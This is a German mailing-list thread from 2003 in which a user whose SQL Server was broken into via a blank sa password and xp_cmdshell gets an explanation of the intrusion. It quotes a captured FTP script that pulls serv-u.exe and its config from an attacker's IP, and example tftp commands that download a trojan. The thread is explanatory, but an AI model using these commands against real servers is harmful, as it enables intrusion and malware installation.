Hallo Stefan, // Ich habe aber ein SA-Pa�wort gesetzt - soweit ich wei� // kannihc den Server ja gar nicht mehr ohne installieren..
Du kannst nach wie vor den Server ohne Pass installieren. Einzig bei der Frage (Registerkarte) ob man ein Passwort setzen will poppt eine Warnmeldung auf die best�tigt werden muss falls man keines will. Ich will Dir ja nicht unterstellen das Du keines gesetzt hast, aber die Vorgehensweise wie auf Deinen Rechner zugegriffen wurde (�ber SQL Server/MSDE)sagt was anderes. In Deinem Fall ging es nur darum auf die SP xp_cmdshell zuzugreifen, um per FTP Dateien auf Deinen Rechner zu �bertragen und nicht Deinen DB Server zu schrotten. Dieses wird meistens dazu missbraucht, verschiedene Warez in undeletbare Verzeichnisse abzuladen, und auf einschl�gigen Seiten zum Download anzubieten. Es h�tte ja durchaus sein k�nnen das der Rechner im Netz steht. sch�nes Wochenende C.Bischof // // -----Urspr�ngliche Nachricht----- // Von: [EMAIL PROTECTED] // [mailto:[EMAIL PROTECTED] Im Auftrag von // Charles Bischof // Gesendet: Freitag, 20. Juni 2003 14:01 // An: [EMAIL PROTECTED] // Betreff: AW: [Coffeehouse] Was amchen mit b�sen �belt�tern // und -innen? // // Hallo Stefan, // // offensichtlich ist Dein Rechner gehackt worden. // Ursache: kein sa Passwort auf dem Lokalem Rechner gesetzt. // // Folgendes ist passiert: // // Nachdem Du dich mit dem Internet verbunden und die Firewall // aufgemacht hast Bist Du durch das Programm "Sfi**" // abgescant worden. Danach mit dem Programm SQLL** wurde // nachgesehen ob Dein Datenbankserver ein leeres Passwort // hat. Das sieht in diesem Programm so aus: // "Checking xxx.xxx.xxx.xxx ::: Password is blank!! <---- WARNING!" // Dann hat man sich mit Sqle**** mit Deinem SQL Server // verbunden und in dem Prog. Sqle**** "c:\dir" eingegeben und // schon wurde Deine Festplatte aufgelistet. // // Und dann geht so was: // // C:\WINNT\ServicePackFiles\i386\tftp.exe -i MeineIpAdresse // GET MeinTrojaner.exe c:\DeinTrojaner.exe ODER // C:\WINNT\System32\tftp.exe -i MeineIpAdresse GET // MeinTrojaner.exe c:\DeinTrojaner.exe // // Nur zur Verst�ndnis // // C.Bischof // // // // // // // // // // // Ich war gerade dabei, meinen Daheim-SQL-Server mit einem // // Produktonssyser // // zu synchronisieren und darum habe ich meine Firewall auf // // Prot 1433 kurz // // aufgemacht. // // Tja, 3 Minuten Sp�ter schl�gt sie alarm, da will jemand // mit der // IP-Adresse 172.178.124.208 auf meinen // SQL-Server zugreifen. // Hab's sofort unterbunden und // finde wenige Augenblicke einen // Versuch des // // Programmes "serv-u.exe" auf 172.178.124.208 zur�ck // zuzugreifen. // Tja, im Win-NT-Verzeichnis (obwohl ich gar // kein WinNT habe // sondern ein // C:\Windows aber egal) // gefunden: // --- cut --- // open 172.178.124.208 // user // serv exe // binary // get /serv-u.exe // c:\winnt\system32\bla\serv-u.exe // get /serv-u.ini // c:\winnt\system32\bla\serv-u.ini // get /login.txt // C:\winnt\system32\bla\login.txt // quit // --- cut --- // // Mich nerven die bl�den Einbrechereien schon so gewaltig, // // ich kanns gar // nicht sagen. Der Typ d�rfte aus dem // AMI-Land kommen - irgendwelche // Chancen mit einer // Anzeige? // // Stefan. // // // ~~~~~~~~~~~~~~~~~~~~~~~~~~~sponsored by United // // Planet~~~~~~~~~~~~~~~~~ // Kaffeepause im United Planet // Communityserver ... // http://www.intrexx.com/communityserver // // _______________________________________________ // // Coffeehouse mailing list // // [EMAIL PROTECTED] // // http://www.glengamoi.com/mailman/listinfo/coffeehouse // // // // // // // ~~~~~~~~~~~~~~~~~~~~~~~~~~~sponsored by United // Planet~~~~~~~~~~~~~~~~~ Kaffeepause im United Planet // Communityserver ... // http://www.intrexx.com/communityserver // _______________________________________________ // Coffeehouse mailing list // [EMAIL PROTECTED] // // http://www.glengamoi.com/mailman/listinfo/coffee// house // // // // ~~~~~~~~~~~~~~~~~~~~~~~~~~~sponsored by United // Planet~~~~~~~~~~~~~~~~~ Kaffeepause im United Planet // Communityserver ... // http://www.intrexx.com/communityserver // _______________________________________________ // Coffeehouse mailing list // [EMAIL PROTECTED] // // http://www.glengamoi.com/mailman/listinfo/coffeehouse // // ~~~~~~~~~~~~~~~~~~~~~~~~~~~sponsored by United Planet~~~~~~~~~~~~~~~~~ Kaffeepause im United Planet Communityserver ... http://www.intrexx.com/communityserver _______________________________________________ Coffeehouse mailing list [EMAIL PROTECTED] http://www.glengamoi.com/mailman/listinfo/coffeehouse
